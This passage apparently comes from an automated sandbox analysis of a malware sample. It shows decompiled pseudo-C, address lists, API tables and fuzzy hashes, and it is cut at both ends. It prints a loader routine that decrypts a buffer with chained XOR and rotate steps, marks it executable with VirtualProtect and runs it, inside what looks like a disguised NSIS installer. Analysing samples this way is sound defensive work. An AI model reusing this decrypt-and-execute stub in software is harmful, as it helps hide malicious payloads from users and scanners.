						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^ 0x0000000a;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) -  *(_t221 - 8);
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t221 - 1) & 0x000000ff) << 0x00000005;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) +  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t221 - 1) & 0x000000ff) << 0x00000002;
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^ 0x00000044;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) - 0x2a;
						 *(_t221 - 1) =  ~( *(_t221 - 1) & 0x000000ff);
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^ 0x0000000f;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) +  *(_t221 - 8);
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^ 0x00000055;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) - 0x8f;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t221 - 1) & 0x000000ff) << 0x00000006;
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) -  *(_t221 - 8);
						 *(_t221 - 1) =  ~( *(_t221 - 1) & 0x000000ff);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) - 0x44;
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^ 0x000000f8;
						 *(_t221 - 1) =  !( *(_t221 - 1) & 0x000000ff);
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) - 0x55;
						 *(_t221 - 1) =  !( *(_t221 - 1) & 0x000000ff);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) +  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t221 - 1) & 0x000000ff) << 0x00000002;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) +  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t221 - 1) & 0x000000ff) << 0x00000007;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) +  *(_t221 - 8);
						 *((char*)( &E73066000 +  *(_t221 - 8))) =  *(_t221 - 1);
						continue;
					}
					L3:
					VirtualProtect( &E73066000, 0x131b, 0x40, _t221 - 0x10); // executed
					E73066000(); // executed
					L4:
					return 0;
					L5:
				}
			}




                                                  0x730559d4
                                                  0x730559d4
                                                  0x730559d4
                                                  0x730559d8
                                                  0x730559db
                                                  0x730559e2
                                                  0x730559e8
                                                  0x730559eb
                                                  0x730559f1
                                                  0x730559fb
                                                  0x73055a04
                                                  0x73055a17
                                                  0x73055a21
                                                  0x73055a2a
                                                  0x73055a36
                                                  0x73055a40
                                                  0x73055a4a
                                                  0x73055a53
                                                  0x73055a5d
                                                  0x73055a67
                                                  0x73055a70
                                                  0x73055a7a
                                                  0x73055a84
                                                  0x73055a8e
                                                  0x73055aa1
                                                  0x73055aab
                                                  0x73055abe
                                                  0x73055ac8
                                                  0x73055ad2
                                                  0x73055adb
                                                  0x73055ae5
                                                  0x73055aef
                                                  0x73055af9
                                                  0x73055b05
                                                  0x73055b18
                                                  0x73055b22
                                                  0x73055b2c
                                                  0x73055b35
                                                  0x73055b3f
                                                  0x73055b4b
                                                  0x73055b54
                                                  0x73055b5e
                                                  0x73055b68
                                                  0x73055b71
                                                  0x73055b7b
                                                  0x73055b8e
                                                  0x73055b98
                                                  0x73055baa
                                                  0x73055bb4
                                                  0x73055bbd
                                                  0x00000000
                                                  0x73055bbd
                                                  0x73055bc8
                                                  0x73055bd8
                                                  0x73055be3
                                                  0x73055be5
                                                  0x73055be8
                                                  0x00000000
                                                  0x73055be8

                                                  APIs
                                                  • VirtualProtect.KERNEL32(73066000,0000131B,00000040,?), ref: 73055BD8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 13faec1b6567e2aaee9da9130610bfe7f7cd99ce77ca71d3e2fe5b864dab5fb7
                                                  • Instruction ID: 88b7082c27fc34617a5a3e1838eb4436dff5c0c722a34f90fca1f4198f07c714
                                                  • Opcode Fuzzy Hash: 13faec1b6567e2aaee9da9130610bfe7f7cd99ce77ca71d3e2fe5b864dab5fb7
                                                  • Instruction Fuzzy Hash: D6710F5485D2EDADCB06CBF944647FCBFB05D2A102F0845DAE4E5B6243C13A938EDB25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73066616, Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                  • Instruction ID: 9be0c066bb9e46a805725546d8c20794fcb98664a0a060b147fdf55ec065af5f
                                                  • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                  • Instruction Fuzzy Hash: F811C675A00109EFDB109BAAE4889AEF7FEEF45A94B544169F806D3258E770DE40C660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73066706, Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                  • Instruction ID: d51b4e3758cd932a65dc7a2339efe4d73be804ac82c9001de4fd1ae33d58a04e
                                                  • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                  • Instruction Fuzzy Hash: FCE09A39760648DFCB04CBA8C981E5AB3F8EB18620B004290F816C73A4EB34EE00DA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73066744, Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction ID: 28876092c3f5b1f43de13a72b6e73b2f525aea093cf8f91d389d7c0045dcb12d
                                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction Fuzzy Hash: 3FE0863E310614CBC311DA19D580A43F3FAFBC89B0B194869E85AD3718C730FC008650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 730666C7, Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728);
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "jhaljjbgtengrcaq Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                  0x0040398a
                                                  0x00403993
                                                  0x00403ad4
                                                  0x00403ad8
                                                  0x00403adc
                                                  0x00403ade
                                                  0x00403ae3
                                                  0x00403aee
                                                  0x00403af9
                                                  0x00403afe
                                                  0x00403b00
                                                  0x00403b02
                                                  0x00403b05
                                                  0x00403b0a
                                                  0x00403b18
                                                  0x00403b25
                                                  0x00403b2c
                                                  0x00403b2c
                                                  0x00403b2d
                                                  0x00403b2d
                                                  0x00403b32
                                                  0x00403b38
                                                  0x00403b3f
                                                  0x00403b45
                                                  0x00403b47
                                                  0x00403b87
                                                  0x00403b8c
                                                  0x00403b91
                                                  0x00403b91
                                                  0x00403b96
                                                  0x00403b9f
                                                  0x00403ba1
                                                  0x00403ba6
                                                  0x00403bac
                                                  0x00403bb0
                                                  0x00403bb0
                                                  0x00403bb5
                                                  0x00403bbb
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bc1
                                                  0x00403bc6
                                                  0x00403bcc
                                                  0x00000000
                                                  0x00000000
                                                  0x00403bd5
                                                  0x00403bdd
                                                  0x00403be2
                                                  0x00403be5
                                                  0x00403beb
                                                  0x00403bf0
                                                  0x00403bf3
                                                  0x00403bf9
                                                  0x00403bfe
                                                  0x00403c01
                                                  0x00403c07
                                                  0x00403c0f
                                                  0x00403c15
                                                  0x00403c1b
                                                  0x00403c1f
                                                  0x00403c26
                                                  0x00403c26
                                                  0x00403c26
                                                  0x00403c30
                                                  0x00403c42
                                                  0x00403c4e
                                                  0x00403c53
                                                  0x00403c5d
                                                  0x00403c63
                                                  0x00403c65
                                                  0x00403c6a
                                                  0x00403c67
                                                  0x00403c67
                                                  0x00403c67
                                                  0x00403c7a
                                                  0x00403c92
                                                  0x00403c94
                                                  0x00403c9a
                                                  0x00403caf
                                                  0x00403c9c
                                                  0x00403ca5
                                                  0x00403ca7
                                                  0x00403ca7
                                                  0x00403cb5
                                                  0x00403cc5
                                                  0x00403cd6
                                                  0x00403cdd
                                                  0x00403ce3
                                                  0x00403ce7
                                                  0x00403cec
                                                  0x00403cee
                                                  0x00000000
                                                  0x00403cf4
                                                  0x00403cf4
                                                  0x00403cf6
                                                  0x00000000
                                                  0x00000000
                                                  0x00403cfc
                                                  0x00403d00
                                                  0x00403d25
                                                  0x00403d2b
                                                  0x00403d31
                                                  0x00403d33
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d59
                                                  0x00403d5f
                                                  0x00403d61
                                                  0x00403d66
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d6c
                                                  0x00403d6f
                                                  0x00403d72
                                                  0x00403d89
                                                  0x00403d95
                                                  0x00403dae
                                                  0x00403db4
                                                  0x00403db8
                                                  0x00403dbd
                                                  0x00403dc3
                                                  0x00000000
                                                  0x00000000
                                                  0x00403dcd
                                                  0x00403dd8
                                                  0x00000000
                                                  0x00403dd8
                                                  0x00403d02
                                                  0x00403d08
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d0e
                                                  0x00403d14
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403d1a
                                                  0x00403cee
                                                  0x00403de5
                                                  0x00403df1
                                                  0x00403df8
                                                  0x00000000
                                                  0x00403b49
                                                  0x00403b49
                                                  0x00403b4c
                                                  0x00403b7f
                                                  0x00403b7f
                                                  0x00403b81
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403b81
                                                  0x00403b4e
                                                  0x00403b52
                                                  0x00403b57
                                                  0x00403b59
                                                  0x00000000
                                                  0x00000000
                                                  0x00403b69
                                                  0x00403b71
                                                  0x00000000
                                                  0x00403b77
                                                  0x004039a5
                                                  0x004039a5
                                                  0x004039a9
                                                  0x004039ae
                                                  0x004039bd
                                                  0x004039bd
                                                  0x004039c6
                                                  0x004039cf
                                                  0x004039da
                                                  0x004039da
                                                  0x004039e6
                                                  0x00403a02
                                                  0x00403a05
                                                  0x00403a18
                                                  0x00403a1e
                                                  0x00403ac1
                                                  0x00000000
                                                  0x00403aca
                                                  0x00403a24
                                                  0x00403a31
                                                  0x00403a33
                                                  0x00403a35
                                                  0x00403a54
                                                  0x00403a54
                                                  0x00403a57
                                                  0x00403a5c
                                                  0x00403a5f
                                                  0x00403a6f
                                                  0x00403a70
                                                  0x00403a72
                                                  0x00403aa8
                                                  0x00403abb
                                                  0x00000000
                                                  0x00403abb
                                                  0x00403a74
                                                  0x00403a7a
                                                  0x00403a93
                                                  0x00403a98
                                                  0x00403a9a
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a9c
                                                  0x00403a88
                                                  0x00403a88
                                                  0x00403a8a
                                                  0x00403a8a
                                                  0x00000000
                                                  0x00403a8a
                                                  0x00403a7d
                                                  0x00403a82
                                                  0x00000000
                                                  0x00403a82
                                                  0x00403a61
                                                  0x00403a67
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a69
                                                  0x00000000
                                                  0x00403a69
                                                  0x00403a59
                                                  0x00000000
                                                  0x00403a59
                                                  0x00403a3f
                                                  0x00403a46
                                                  0x00403a4c
                                                  0x00403a4e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a4e
                                                  0x00403a0a
                                                  0x00000000
                                                  0x004039e8
                                                  0x004039ee
                                                  0x004039f8
                                                  0x00403dfe
                                                  0x00403e04
                                                  0x00403e06
                                                  0x00403e0c
                                                  0x00403e11
                                                  0x00403e17
                                                  0x00403e17
                                                  0x00403e0c
                                                  0x00403e21
                                                  0x00000000
                                                  0x00403e21
                                                  0x004039e6

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                  • ShowWindow.USER32(?), ref: 004039DA
                                                  • DestroyWindow.USER32 ref: 004039EE
                                                  • SetWindowLongA.USER32 ref: 00403A0A
                                                  • GetDlgItem.USER32(?,?), ref: 00403A2B
                                                  • SendMessageA.USER32 ref: 00403A3F
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                                  • SendMessageA.USER32 ref: 00403B69
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                                  • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                  • EnableWindow.USER32(?,?), ref: 00403C42
                                                  • EnableWindow.USER32(?,?), ref: 00403C5D
                                                  • GetSystemMenu.USER32 ref: 00403C73
                                                  • EnableMenuItem.USER32 ref: 00403C7A
                                                  • SendMessageA.USER32 ref: 00403C92
                                                  • SendMessageA.USER32 ref: 00403CA5
                                                  • lstrlenA.KERNEL32(00420538,?,00420538,jhaljjbgtengrcaq Setup), ref: 00403CCE
                                                  • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: jhaljjbgtengrcaq Setup
                                                  • API String ID: 184305955-2508380529
                                                  • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                  • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                  • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                  • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403F9C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
